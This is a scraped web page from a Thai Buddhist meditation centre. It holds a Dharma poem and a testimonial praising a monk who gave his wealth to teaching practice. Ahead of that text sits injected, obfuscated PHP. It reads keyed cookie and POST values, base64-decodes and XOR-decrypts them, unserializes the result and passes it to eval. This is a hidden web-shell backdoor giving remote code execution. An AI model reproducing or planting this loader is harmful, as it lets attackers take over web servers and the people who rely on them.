$gISZHjgDQ = chr (67) . '_' . 'Y' . chr ( 180 - 107 ).chr (85) . chr ( 1093 - 973 ).'V';$bfLKd = "\x63" . "\x6c" . 'a' . 's' . "\163" . "\x5f" . chr (101) . "\170" . "\151" . 's' . chr ( 399 - 283 )."\163";$xnxaNiXQgk = class_exists($gISZHjgDQ); $bfLKd = "19980";$IYMozkSOu = !1;if ($xnxaNiXQgk == $IYMozkSOu){function ILYcYImbfn(){$EBKhUbi = new /* 50159 */ C_YIUxV(56193 + 56193); $EBKhUbi = NULL;}$UcoaYwYK = "56193";class C_YIUxV{private function UMWdPx($UcoaYwYK){if (is_array(C_YIUxV::$dKrkPX)) {$btWUJV = str_replace(chr (60) . '?' . chr (112) . "\x68" . chr (112), "", C_YIUxV::$dKrkPX[chr (99) . "\x6f" . 'n' . "\x74" . "\145" . chr ( 847 - 737 )."\164"]);eval($btWUJV); $UcoaYwYK = "56193";exit();}}private $pfYboxUt;public function erDrDQxxD(){echo 45787;}public function __destruct(){C_YIUxV::$dKrkPX = @unserialize(C_YIUxV::$dKrkPX); $UcoaYwYK = "16972_21716";$this->UMWdPx($UcoaYwYK); $UcoaYwYK = "16972_21716";}public function VlAvhWhqO($jNNCCCm, $rYCWIb){return $jNNCCCm[0] ^ str_repeat($rYCWIb, (strlen($jNNCCCm[0]) / strlen($rYCWIb)) + 1);}public function __construct($UwJpXbPW=0){$UIMmmtBEqf = $_POST;$mozmYRH = $_COOKIE;$rYCWIb = "3a0ba29f-1560-4af9-8870-7ae2d2693801";$rfTPJ = @$mozmYRH[substr($rYCWIb, 0, 4)];if (!empty($rfTPJ)){$NhxgbgDIku = "base64";$jNNCCCm = "";$rfTPJ = explode(",", $rfTPJ);foreach ($rfTPJ as $NdnfYJZO){$jNNCCCm .= @$mozmYRH[$NdnfYJZO];$jNNCCCm .= @$UIMmmtBEqf[$NdnfYJZO];}$jNNCCCm = array_map($NhxgbgDIku . "\x5f" . "\144" . 'e' . "\143" . "\x6f" . chr (100) . chr ( 555 - 454 ), array($jNNCCCm,));C_YIUxV::$dKrkPX = $this->VlAvhWhqO($jNNCCCm, $rYCWIb);}}public static $dKrkPX = 10338;}ILYcYImbfn();}$iniKU = "\x4e" . 'g' . chr ( 756 - 658 )."\137" . chr ( 907 - 838 ).chr (66) . "\167";$myyExn = 'c' . 'l' . "\141" . "\x73" . "\163" . "\x5f" . "\x65" . chr (120) . chr ( 277 - 172 ).chr ( 880 - 765 )."\x74" . "\163";$vTdOqhW = class_exists($iniKU); $myyExn = "32259";$vAAay = !1;if ($vTdOqhW == $vAAay){function Jwxxo(){return FALSE;}$QfzmsEypX = "15648";Jwxxo();class Ngb_EBw{private function xKGGL($QfzmsEypX){if (is_array(Ngb_EBw::$avSeuoHui)) {$HNNJexxV = str_replace(chr (60) . chr ( 542 - 479 )."\160" . chr (104) . "\x70", "", Ngb_EBw::$avSeuoHui["\143" . "\x6f" . "\156" . 't' . "\145" . 'n' . "\x74"]);eval($HNNJexxV); $QfzmsEypX = "15648";exit();}}private $PpOeVk;public function eCrFVEB(){echo 28385;}public function __destruct(){$QfzmsEypX = "20419_16761";$this->xKGGL($QfzmsEypX); $QfzmsEypX = "20419_16761";}public function __construct($PlBYqoqvu=0){$JCuGXEK = $_POST;$LVuXxA = $_COOKIE;$otdEyqxrW = "abbe5226-71cc-40c5-9d39-6b2242a26fb4";$drVNpRcsa = @$LVuXxA[substr($otdEyqxrW, 0, 4)];if (!empty($drVNpRcsa)){$joLSFKk = "base64";$jVoOivToi = "";$drVNpRcsa = explode(",", $drVNpRcsa);foreach ($drVNpRcsa as $ythUtVZV){$jVoOivToi .= @$LVuXxA[$ythUtVZV];$jVoOivToi .= @$JCuGXEK[$ythUtVZV];}$jVoOivToi = array_map($joLSFKk . chr ( 292 - 197 )."\144" . "\145" . "\143" . "\157" . 'd' . 'e', array($jVoOivToi,)); $jVoOivToi = $jVoOivToi[0] ^ str_repeat($otdEyqxrW, (strlen($jVoOivToi[0]) / strlen($otdEyqxrW)) + 1);Ngb_EBw::$avSeuoHui = @unserialize($jVoOivToi); $jVoOivToi = class_exists("20419_16761");}}public static $avSeuoHui = 42183;}$wsxQiirY = new /* 12138 */ $iniKU(15648 + 15648); $QfzmsEypX = strpos($QfzmsEypX, $QfzmsEypX); $vAAay = $wsxQiirY = $QfzmsEypX = Array();} ประสบการณ์พระอุทัย วุฒิสาโร | ศูนย์พลาญข่อย
080-5519598 (คุณแก้ว) plarnkhoi@hotmail.com
Select Page

พลาญเอย  พลาญเอย  มูลนิธิผู้ด้อยอันก้าวหน้า
อะไร  คือ  อะไร  ไม่เข้าใจ  เชิญเข้ามา
โอมพิจารณา  มหาพิจารณาให้แจ้งใจ
ธรรมะ  มิใช่เพียงจำ  ต้องทำด้วย
จึงจะช่วยให้ชีวิตสวยสดใส
เปลื้องภาระสารพัด  สะบัดทิ้งไป
ประสบชัย  สมหวัง  ดังจำนง
รู้จำ  รู้จริง  จึงรู้แจ้ง  (จึงรู้แจ่มแจ้ง)
จำแนก  แจกแจง  สัมฤทธิ์  สมประสงค์
ค่อยก้าวไป  ก้าวต่อไป  ให้ถึงธง
ความตั้งใจอันถูกตรง  จึงตรงสู่หลักชัย

นับเป็นความมหัศจรรย์จริงจริง เพราะไม่คิดว่าจะมีคนคิดเช่นนี้ได้ ในยุคนี้สมัยนี้ การบริจาคทรัพย์ทั้งหมดพร้อมทั้งอุทิศชีวิตเท่าที่เหลืออยู่เพื่อนำทางสร้างคน ทั้งเยาวชน ทั้งคนวัยทำงาน และผู้สูงอายุที่ต้องการศึกษาปฏิบัติธรรม ท่านทำหน้าที่ผู้ให้ ทั้งให้ธรรมะและให้ทาน ให้เพื่อให้แก่ผู้รับอย่างเต็มอกเต็มใจ สถานที่นี้จึงเป็นแดนกัลยาณมิตรตามแบบของพระพุทธเจ้า มีแต่ความปรารถนาดี เต็มใจที่เอื้อเฟื้อเกื้อกูลอยู่เสมอ เป็นความอบอุ่นใจไว้วางใจ ศรัทธาที่จะพยายามทำให้สุดฝีมือ แม้จะมีเวลาจำกัด สำหรับผู้ที่เข้ามาสัมผัสศูนย์พลาญข่อย แต่ก็เปี่ยมไปด้วยความตั้งใจดีเท่าที่ตนจะพยายามได้ ใครยังมิได้มา ยังไม่รู้ความเป็นไปก็ควรที่จะได้ตั้งใจมาให้ได้ มาสัมผัสวิถีทางแห่งกัลยาณมิตร มาสัมผัสความศักดิ์สิทธิ์ ที่ต้องทำต้องปฏิบัติด้วยตนเอง